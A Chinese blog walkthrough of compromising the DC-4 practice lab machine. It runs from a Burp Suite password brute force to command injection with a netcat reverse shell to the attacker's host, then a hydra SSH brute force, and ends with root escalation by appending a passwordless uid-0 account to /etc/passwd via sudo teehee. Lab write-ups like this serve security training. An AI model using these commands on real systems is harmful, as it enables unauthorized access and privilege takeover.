渗透测试:DC-4靶机

一、扫描获取靶机ip

arp-scan -l

在这里插入图片描述

192.168.203.143

二、获取网站信息

访问网站

在这里插入图片描述

1.nmap

nmap -sV -A 192.168.203.143

在这里插入图片描述

开放了80、22端口

看见22端口开放了ssh

2.Wappaloyzer

在这里插入图片描述

Web服务器:Nginx 1.15.10

3.BurpSuit

登录,用户名admin,密码随意
在这里插入图片描述
用burpsuit拦截

爆破密码

在这里插入图片描述

密码:happy

成功登陆

在这里插入图片描述

上传命令,继续拦截

在这里插入图片描述

先改成ls

在这里插入图片描述

也可以使用其他命令

在这里插入图片描述
在这里插入图片描述

我们尝试反弹shell

kali监听

nc -vnlp 3939

在这里插入图片描述

BurpSuit发送命令

radio=nc 192.168.203.141 3939 -e /bin/bash&submit=Run

成功连接

在这里插入图片描述

使用python反弹一个交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

在这里插入图片描述

切换到根目录

cd /

在这里插入图片描述

cd home    切换到home文件夹
ls         发现三个账户,一次cd 发现jim中有文件
cd jim     切换到jim
ls         发现文件
cat backups切换到backups 
ls         发现备份密码文件old-passwords.bak

在这里插入图片描述

将密码备份到本地,我将其命名为1.txt

返回到/home/jim

查看test.sh

cat test.sh

在这里插入图片描述

4.hydra

考虑用hydra进行对jim的密码进行爆破,密码本为1.txt

创建账号名文件2.txt,写入三个用户名

vim 2.txt	charkes	jim	san

使用hydra爆破密码

hydra -L 2.txt -P 1.txt ssh://192.168.203.143

在这里插入图片描述

爆破出账号:jim 密码:jibril04

5.ssh

ssh连接

ssh jim@192.168.203.143

在这里插入图片描述

查看现有文件,查看mbox

ls
cat mbox

在这里插入图片描述

在ssh成功连接后有一句提示:我们收到了一封邮件

在这里插入图片描述

我们找一下email

find / -name "*mail*"

在这里插入图片描述

最后终于发下mail文件在 /var/mail 中

在这里插入图片描述

cat /var/mail
cat jim

在这里插入图片描述

得密码

Charles去度假了,因此老板要求他把他的密码给jim防止出现什么问题

^xHhA&hvim0y

所以我们可以登录Charles的账号

在这里插入图片描述

sudo -l

在这里插入图片描述

发现我们利用teeheee提权进行root操作

teehee提权是使用teehee -a 把一个账号密码写入到etc/passwd中,这个用户具有root权限,再切换到这个用户即可

  1. 尝试在/etc/passwd文件下追加内容,该文件的结构:
用户名:是否有密码保护(x即有保护):uid:gid:全称:home目录:/bin/bash
echo "ciyaso::0:0:::/bin/bash" | sudo teehee -a /etc/passwd    //提权语句
su ciyaso
cat /root/flag.txt

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值